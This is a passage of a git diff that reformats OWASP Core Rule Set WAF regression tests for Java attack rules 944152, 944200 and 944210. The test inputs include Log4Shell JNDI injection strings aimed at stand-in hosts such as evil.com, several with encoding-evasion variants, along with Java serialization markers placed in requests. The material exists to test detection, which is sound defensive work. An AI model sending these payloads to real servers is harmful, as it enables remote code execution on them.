+ - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 22 desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-23 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 23 desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: '${jndi:ldap://evil.om/w}' - Content-Type: text/html - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-24 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: '${jndi:ldap://evil.om/w}' + Content-Type: text/html + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 24 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon stages: - - stage: - input: - dest_addr: "127.0.0.1" - 
headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-25 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 25 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-26 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 26 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbracesomethingnotcoveredbyotherrules"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + 
Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbracesomethingnotcoveredbyotherrules"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml index 288c536ec..8016cdce6 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml @@ -1,17 +1,15 @@ --- meta: author: "spartantri" - enabled: true - name: "944200.yaml" - description: "Description" +rule_id: 944200 tests: - - test_title: 944200-1 + - test_id: 1 desc: Argument test includes java serialization magic bytes, base64 encoded request stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - encoded_request: "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" - output: - log_contains: "id \"944200\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + encoded_request: "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" + output: + log: + expect_ids: [944200] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml index da10d5c1b..8aa888914 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml 
@@ -1,1108 +1,1106 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944210.yaml" - description: "Positive tests for rule 944210" +rule_id: 944210 tests: - - test_title: 944210-1 + - test_id: 1 desc: "Argument test includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=rO0ABQ" - output: - log_contains: "id \"944210\"" - - test_title: 944210-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=rO0ABQ" + output: + log: + expect_ids: [944210] + - test_id: 2 desc: "Argument name includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "rO0ABQ=test" - output: - log_contains: "id \"944210\"" - - test_title: 944210-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "rO0ABQ=test" + output: + log: + expect_ids: [944210] + - test_id: 3 desc: "Cookie test includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=rO0ABQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=rO0ABQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 4 desc: "Cookie name includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: rO0ABQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 
944210-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: rO0ABQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 5 desc: "Request header test includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: rO0ABQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: rO0ABQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 6 desc: "XML element includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: 
"/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944210] + - test_id: 7 desc: "XML attribute name includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944210] + - test_id: 8 desc: "XML attribute value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: 
"POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944210] + - test_id: 9 desc: "XML element value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "rO0ABQ" - output: - log_contains: "id \"944210\"" - - test_title: 944210-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "rO0ABQ" + output: + log: + expect_ids: [944210] + - test_id: 10 desc: "Nested XML element value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" 
- method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "rO0ABQ" - output: - log_contains: "id \"944210\"" - - test_title: 944210-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "rO0ABQ" + output: + log: + expect_ids: [944210] + - test_id: 11 desc: "Content-Type text/plain includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=rO0ABQ" - output: - log_contains: "id \"944210\"" - - test_title: 944210-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=rO0ABQ" + output: + log: + expect_ids: [944210] + - test_id: 12 desc: "Content-Type application/json arg value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"rO0ABQ\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"rO0ABQ\"}" + output: + log: + expect_ids: [944210] + - test_id: 13 desc: "Content-Type application/json arg name includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"rO0ABQ\": \"test\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"rO0ABQ\": \"test\"}" + output: + log: + expect_ids: [944210] + - test_id: 14 desc: "Content-Type multipart/form-data json arg name includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"rO0ABQ": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-15 + {"rO0ABQ": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 15 desc: "Content-Type multipart/form-data json arg value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 
80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"rO0ABQ": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-16 + {"rO0ABQ": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 16 desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; 
name="payload" + Content-Type: application/xml - rO0ABQ - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-17 + rO0ABQ + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 17 desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - rO0ABQ - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-18 + rO0ABQ + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 18 desc: "Argument test includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=KztAAU" - output: - log_contains: "id \"944210\"" - - test_title: 944210-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=KztAAU" + output: + log: + expect_ids: [944210] + - test_id: 19 desc: "Argument name includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "KztAAU=test" - output: - log_contains: "id \"944210\"" - - test_title: 944210-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "KztAAU=test" + output: + log: + expect_ids: [944210] + - test_id: 20 desc: "Cookie test includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - 
headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=KztAAU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=KztAAU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 21 desc: "Cookie name includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: KztAAU=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: KztAAU=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + 
log: + expect_ids: [944210] + - test_id: 22 desc: "Request header test includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: KztAAU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-23 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: KztAAU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 23 desc: "XML element includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - 